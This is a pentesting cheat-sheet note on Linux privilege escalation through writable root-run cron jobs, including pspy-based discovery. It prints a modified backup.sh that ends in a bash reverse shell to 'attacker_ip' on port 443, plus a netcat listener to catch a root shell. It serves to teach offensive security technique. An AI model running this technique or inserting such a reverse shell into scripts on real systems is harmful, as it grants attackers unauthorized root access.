## General A cron job vulnerability in Linux refers to a security weakness in the way that cron jobs (scheduled tasks in the Linux operating system) are configured or used. This type of vulnerability can allow an attacker to gain unauthorized access to a system, execute malicious code, or perform other malicious actions. Some potential sources of cron job vulnerabilities include: - Improperly configured cron job permissions: If a cron job has inadequate permissions, an attacker may be able to modify or delete it, or execute it with the privileges of the user or group that owns the cron job. - Insecurely stored credentials: If a cron job requires access to sensitive data or resources, such as passwords or private keys, and these credentials are stored in an insecure manner (e.g., in a plaintext file), an attacker may be able to access them. - Unvalidated input: If a cron job processes input from an untrusted source, such as data entered by a user or received over the network, and this input is not properly validated, an attacker may be able to inject malicious code or data that is executed when the cron job runs. ## Commands ## Manual Exploitation 1. Find writeable files or directories (Manual) ``` cat /etc/crontab ---> Check if there is cron job crontab -l ---> Check the schedule for a cron job ``` - Check permissions of the cron jobs (EX: writeable and runs as root -> Will give you Root access) - Check the Schedule of cron jobs - Add a one-liner reverse shell in the corruptible file ---> [Link for one-liner reverse shell](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) - Set a Lisener and wait for the cron job to be executed ## Automated Exploitation - Automated Cron-Jobs Finding 1. Run pspy to see running processes, commands, and cron-jobs ``` ./pspy64 -pf -i 1000 ``` '---> Github Link: https://github.com/DominicBreuker/pspy ![[Screenshot from 2022-11-28 20-46-56.png]] - (EXAMPLE) From the above output, we can see that a cron job runs the backup.sh script located in the /dmz-backups directory and creating a tarball file of the contents of the /var/www/html directory. 3. Examine the backup.sh script ``` nano /dmz-backups/backup.sh ---> The vulnerable cron job (ex) ``` 4. Add a bash one-liner reverse shell to the end of the script ``` #!/bin/bash SRCDIR="/var/www/html" DESTDIR="/dmz-backups/" FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date+%-T).tgz tar --absolute-names --create --gzip -- file=$DESTDIR$FILENAME $SRCDIR bash -i >& /dev/tcp/attacker_ip/443 0>&1 ``` - Using Port 443 (Often allowed through firewalls) -- Not obligated to use this port 5. Set up a netcat listener and become root! ``` nc -lnvp 443 ```